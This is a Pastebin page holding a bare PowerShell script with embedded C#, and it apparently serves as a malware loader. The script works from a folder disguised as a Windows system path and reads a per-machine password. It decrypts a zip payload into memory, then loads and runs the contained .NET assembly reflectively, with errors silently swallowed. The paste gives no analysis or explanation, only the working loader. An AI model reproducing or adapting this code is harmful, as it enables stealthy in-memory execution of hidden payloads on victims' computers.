Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Clear-Host [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") [System.Reflection.Assembly]::LoadWithPartialName("System") [System.Reflection.Assembly]::LoadWithPartialName("using System.IO") [System.Reflection.Assembly]::LoadWithPartialName("System.Reflection") [System.Reflection.Assembly]::LoadWithPartialName("System.Runtime.InteropServices") [System.Reflection.Assembly]::LoadWithPartialName("using System.Text") [System.Reflection.Assembly]::LoadWithPartialName("System.Threading") [System.Reflection.Assembly]::LoadWithPartialName("System.Management") [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") [System.Reflection.Assembly]::LoadFrom("C:\Windows\SysWoW64\Java\Ionic.Zip.Reduced.dll") $assem = ("C:\Windows\SysWoW64\Java\Ionic.Zip.Reduced.dll") $Source = @" using System; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Text; using System.Text.RegularExpressions; public static class class1 { static string nameDll = Regex.Replace(Environment.MachineName, @"[^A-Za-z0-9]", "-") + ".dll"; static string nameZip = Regex.Replace(Environment.MachineName, @"[^A-Za-z0-9]", "-") + ".zip"; static string namePass = Regex.Replace(Environment.MachineName, @"[^A-Za-z0-9]", "-") + ".aes"; static string WorkPath = @"C:\Windows\SysWoW64\Java"; public static byte[] byteees = null; public static String dlls = @"C:\Windows\SysWoW64\Java\Ionic.Zip.Reduced.dll"; public static int classeInit = 231; public static int metodoInit = 1; static System.Reflection.Assembly CurrentDomain_AssemblyResolve(object sender, ResolveEventArgs args) { return (Assembly)Assembly.LoadFile(dlls); } public static String getPathZip() { return Path.Combine(WorkPath, nameZip); } public static String getPass() { return System.Text.Encoding.UTF8.GetString(File.ReadAllBytes(Path.Combine(WorkPath, namePass))); } public static void Main(MemoryStream ms) { try { byteees = ms.ToArray(); Object[] OBJECTO01 = new Object[] { new String[] { "/last", @"C:\Windows\SysWoW64\Java","" } }; Assembly var3 = Assembly.Load(byteees); var3.GetTypes()[classeInit].GetMethods()[metodoInit].Invoke(Activator.CreateInstance(var3.GetTypes()[classeInit]), OBJECTO01); } catch (Exception f) { } } } "@ Add-Type -Path "C:\Windows\SysWoW64\Java\Ionic.Zip.Reduced.dll" Add-Type -ReferencedAssemblies $assem -TypeDefinition $Source -IgnoreWarnings [class1]::getPathZip() $zip = [Ionic.Zip.ZIPFile]::Read([class1]::getPathZip()) $zip.Password = [class1]::getPass() $memStream = New-Object System.IO.MemoryStream foreach ($file in $zip.Entries) { $file.Extract($memStream); } [class1]::Main($memStream)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement